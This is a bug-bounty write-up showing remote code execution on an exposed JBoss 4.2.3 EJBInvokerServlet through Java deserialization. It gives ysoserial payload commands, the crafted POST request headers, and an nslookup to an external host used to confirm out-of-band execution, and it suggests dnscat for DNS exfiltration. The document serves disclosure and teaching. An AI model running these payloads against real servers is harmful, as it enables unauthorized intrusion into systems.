Utilizing SSRF to Pivot Internal Networks

This is from a private bounty. The internal —-private.com domain was out of scope so I was asked to stop testing once I found the bug.

SSRF To Pivot Internal Networks

Exploiting Java Deserialization Via JBoss

Background

First off, I would just like to reference the following sites/authors/tools for helping guide me along this route and providing a sweet tool to make this easy:

• https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/#jboss
• https://github.com/frohoff/ysoserial
• http://artsploit.blogspot.com/2016/01/paypal-rce.html

I ran into a JMXInvokerServlet/EJBInvokerServlet on a private bug bounty. Generally with these, you can just deploy a JSP shell and be done with it. I was running into some issues with this method and I’m not exactly sure why. However, I was still able to get RCE via this version of JBoss (4.2.3) being vulnerable to the Java Deserialization issue. There was egress filtering on this Windows host that didn’t allow me to perform http, ftp, or telnet. I was able to do DNS lookups though which will be shown at the end. I was able to determine it was a windows host due to some file not found-ish error messages.

Steps to Exploit

1. Grab a copy of ysoserial
2. Dump your payload into a file:
   $ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘fake.exe’ > serialdata
3. If you’ll notice, I used ‘fake.exe’ as an example. Originally I was running commands like wget, curl, python, perl, etc. and I would receive some errors in the serialized response, “The system cannot find the file specified.”
4. To create your POST request for the endpoint use the following headers:
   POST /invoker/EJBInvokerServlet HTTP/1.1
   Host: site.com
   Accept: */*
   Accept-Language: en
   ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation
   User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
   Connection: close
   Content-Length: 1400
5. Right click inside the request tab in Repeater and select ‘Paste from file’ and select the file containing serialized data.
   
6. Response (‘cannot find file’ is present):
   
7. I then decided to try cmd.exe
   $ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘cmd.exe’ > serialdata
8. Request:
   
9. Response (‘cannot find file’ is not present):
   
10. From these responses, we can gather that I am able to run cmd.exe. At this point I tried a couple ways of outbound connections; however, I was only able to get DNS lookups to work. Thank you @dawgyg for letting me use your DNS server!
11. Command:
    $ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘nslookup mealstest.example.com’ > serialtest
12. External DNS server logs:
    $ sudo tail -f /var/log/messages
    …snip…

    Jul 22 00:10:00 server named[7356]: client 18x.x.x.x#33347: query: mealstest.example.com IN A -EDC (10.0.5.200)

13. I suspect I might have been able to copy over dnscat line by line then run the code. However I am short on time and the RCE was already proven .